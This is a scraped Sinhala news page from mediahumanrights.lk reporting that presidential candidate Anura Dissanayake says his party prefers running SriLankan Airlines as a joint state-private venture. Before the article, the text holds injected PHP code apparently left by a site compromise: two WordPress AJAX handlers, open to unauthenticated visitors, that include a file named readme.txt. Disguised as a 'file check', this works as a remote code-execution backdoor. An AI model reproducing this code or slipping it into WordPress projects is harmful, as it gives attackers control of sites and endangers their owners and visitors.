if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මාලිමා ආණ්ඩුවෙන් ශ‍්‍රී ලන්කන් ගුවන් සේවය රාජ්‍ය පෞද්ගලික හවුල් ව්‍යාපාරයක් ලෙස..- අනුර - mediahumanrights.lk
mediahumanrights.lk
News Political

මාලිමා ආණ්ඩුවෙන් ශ‍්‍රී ලන්කන් ගුවන් සේවය රාජ්‍ය පෞද්ගලික හවුල් ව්‍යාපාරයක් ලෙස..- අනුර

ශ්‍රී ලංකන් ගුවන් සේවය රාජ්‍ය හා පෞද්ගලික ඒකාබද්ධ ව්‍යාපාරයක් ලෙස පවත්වාගෙන යාමට ජාතික ජන බලවේග රජයක් වඩාත් කැමති බව එම පක්ෂයේ ජනාධිපති අපේක්ෂක පාර්ලිමේන්තු මන්ත්‍රී අනුර දිසානායක මහතා සඳහන් කරයි.

ජාතික ජන බලවේගයේ සංචාරක ප්‍රතිපත්තිය එළිදැක්වීමේ උත්සව සභාව අමතමින් හෙතෙම මෙම අදහස් පළ කළේය.

‘අපි අපේ ගුවන්තොටුපොළේ නවීකරණයක් සිදු කළ යුතුයි. කටුනායක ගුවන්තොටුපොළ නවීකරණය කිරීමට පැමිණි ආයෝජකයන් එය දාලා ගියේ ඇයි කියලා හැමකෙනෙක්ම දන්නවා.

අපි ප්‍රතිපත්තියක් ලෙස ජාතික ගුවන් සේවයට පක්‍ෂපාතී වන අතර, දැන් අපට ශ්‍රීලංකන් පිළිබඳව ප්‍රශ්නයක් තිබෙනවා.

එය රජයේ තබාගෙන වර්ධනය කරන්න පුළුවන්ද. රජය සහ කළමනාකරණ හැකියාව තිබෙන සමාගමක් එක් කරගෙන ඒකාබද්ධව මෙහෙයවන්න පුළුවන්ද. නැත්නම්, මුළුමනින්ම අත්හැර දමනවාද යන විකල්ප තුන අප හමුවේ තිබෙනවා.

එයින් අප වඩාත් කැමැති ජාතික ගුවන් සේවය රජය සහ පෞද්ගලික ඒකාබද්ධ ව්‍යාපාරයක් ලෙස පවත්වාගෙන යන්නයි’

Related posts

GSP බදු සහනය මේ මාසයේ සිට වලංගු වෙයි !

Shiran Viraj

ජනවාරි මැද සිට ඇෆ්ගනිස්තානයේ දරැණු ගැටුම් හටගැනීමෙි අනතුරක්

Shiran Viraj

විදුලි ගාස්තු 1/3කින් අඩු කරනවා.. සුලං විදුලිය ගිගාවොට් 40 හදනවා..

Shiran Viraj